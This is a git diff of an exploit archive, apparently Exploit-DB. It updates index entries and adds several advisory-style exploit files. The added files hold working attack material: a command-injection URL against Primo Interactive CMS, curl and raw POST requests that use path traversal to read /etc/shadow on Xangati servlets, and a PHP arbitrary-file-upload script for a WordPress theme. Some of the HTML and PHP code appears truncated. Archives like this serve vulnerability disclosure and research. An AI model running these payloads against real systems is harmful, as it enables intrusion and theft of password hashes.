diff --git a/files.csv b/files.csv index c5c5f0382..ccf7bf2c0 100755 --- a/files.csv +++ b/files.csv @@ -382,7 +382,7 @@ id,file,description,date,author,platform,type,port 407,platforms/cgi/webapps/407.txt,"AWStats (5.0-6.3) Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0 408,platforms/linux/remote/408.c,"Qt BMP Parsing Bug Heap Overflow Exploit",2004-08-21,infamous41md,linux,remote,0 409,platforms/bsd/remote/409.c,"BSD (telnetd) Remote Root Exploit",2001-06-09,Teso,bsd,remote,23 -411,platforms/linux/local/411.c,"Sendmail 8.11.x Exploit (i386-Linux)",2001-01-01,sd,linux,local,0 +411,platforms/linux/local/411.c,"Sendmail 8.11.x - Exploit (i386-Linux)",2001-01-01,sd,linux,local,0 413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection Vulnerability",2004-08-25,"Serkan Akpolat",linux,remote,0 417,platforms/linux/local/417.c,"SquirrelMail (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0 @@ -14526,7 +14526,7 @@ id,file,description,date,author,platform,type,port 16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16722,platforms/windows/remote/16722.rb,"Xlink FTP Client Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon PORT Command Memory Corruption",2010-09-20,metasploit,windows,remote,0 -16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 Username Overflow",2010-07-03,metasploit,windows,remote,0 +16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - Username Overflow",2010-07-03,metasploit,windows,remote,0 16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,metasploit,windows,remote,0 16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve FTP PORT Buffer Overflow",2010-04-30,metasploit,windows,remote,5554 @@ -35383,3 +35383,12 @@ id,file,description,date,author,platform,type,port 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0 39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Local Root Vulnerability",2015-12-30,"Larry W. Cashdollar",linux,local,0 +39135,platforms/php/webapps/39135.php,"WordPress Felici Theme 'uploadify.php' Arbitrary File Upload Vulnerability",2014-03-23,"CaFc Versace",php,webapps,0 +39136,platforms/php/webapps/39136.txt,"Symphony <= 2.2.4 Cross Site Request Forgery Vulnerability",2014-03-24,"High-Tech Bridge",php,webapps,0 +39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS 'pcm.cgi' Remote Command Execution Vulnerability",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0 +39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem Cross Site Request Forgery Vulnerability",2014-04-12,"Blessen Thomas",hardware,remote,0 +39139,platforms/php/webapps/39139.txt,"PHPFox Access Control Security Bypass Vulnerability",2014-04-05,"Wesley Henrique",php,webapps,0 +39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component 'index.php' SQL Injection Vulnerability",2014-04-08,Lazmania61,php,webapps,0 +39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0 +39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 diff --git a/platforms/cgi/webapps/39137.txt b/platforms/cgi/webapps/39137.txt new file mode 100755 index 000000000..a7ce061fa --- /dev/null +++ b/platforms/cgi/webapps/39137.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/66549/info + +Primo Interactive CMS is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary commands in the context of the affected application. + +Primo Interactive CMS 6.2 is vulnerable; other versions may also be affected. + +http://www.example.com/cgi-bin/pcm.cgi?download=;id| \ No newline at end of file diff --git a/platforms/hardware/remote/39138.html b/platforms/hardware/remote/39138.html new file mode 100755 index 000000000..3f1c734a2 --- /dev/null +++ b/platforms/hardware/remote/39138.html @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/66593/info + +ICOMM 610 is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. + +ICOMM 610 01.01.08.991 and prior are vulnerable. + + + +
+ + + diff --git a/platforms/jsp/webapps/39142.txt b/platforms/jsp/webapps/39142.txt new file mode 100755 index 000000000..e2417892d --- /dev/null +++ b/platforms/jsp/webapps/39142.txt @@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/66817/info + +Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities. + +A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information. + +Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. + +curl -i -s -k -X 'POST' \ +-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \ +--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \ +'hxxps://www.example.com/servlet/MGConfigData' + +POST /servlet/MGConfigData HTTP/1.1 +key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=www.example.com + +POST /servlet/MGConfigData HTTP/1.1 +key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=www.example.com + +curl -i -s -k -X 'POST' \ +-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \ +--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \ +'hxxps://www.example.com/servlet/MGConfigData' \ No newline at end of file diff --git a/platforms/jsp/webapps/39143.txt b/platforms/jsp/webapps/39143.txt new file mode 100755 index 000000000..aefaac0b0 --- /dev/null +++ b/platforms/jsp/webapps/39143.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/66817/info + +Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities. + +A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information. + +Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. + +curl -i -s -k -X 'POST' \ +-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \ +--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \ +'hxxps://www.example.com/servlet/Installer' \ No newline at end of file diff --git a/platforms/linux/local/411.c b/platforms/linux/local/411.c index 4b40827ea..33df094d0 100755 --- a/platforms/linux/local/411.c +++ b/platforms/linux/local/411.c @@ -399,6 +399,6 @@ int main(int argc, char *argv[]) /* That's all. */ - - -// milw0rm.com [2001-01-01] + + +// milw0rm.com [2001-01-01] diff --git a/platforms/php/webapps/39135.php b/platforms/php/webapps/39135.php new file mode 100755 index 000000000..d1f20d7e9 --- /dev/null +++ b/platforms/php/webapps/39135.php @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/66490/info + +The Felici theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible. + +Felici 1.7 is vulnerable; other versions may also be affected. + +"@$uploadfile", +'folder'=>'/wp-content/plugins/custom-background/uploadify/')); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; +?> diff --git a/platforms/php/webapps/39136.txt b/platforms/php/webapps/39136.txt new file mode 100755 index 000000000..22ff890d1 --- /dev/null +++ b/platforms/php/webapps/39136.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/66536/info + +Symphony is prone to a cross-site request-forgery vulnerability. + +An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks. + +Symphony version 2.3.1 and prior are vulnerable. + +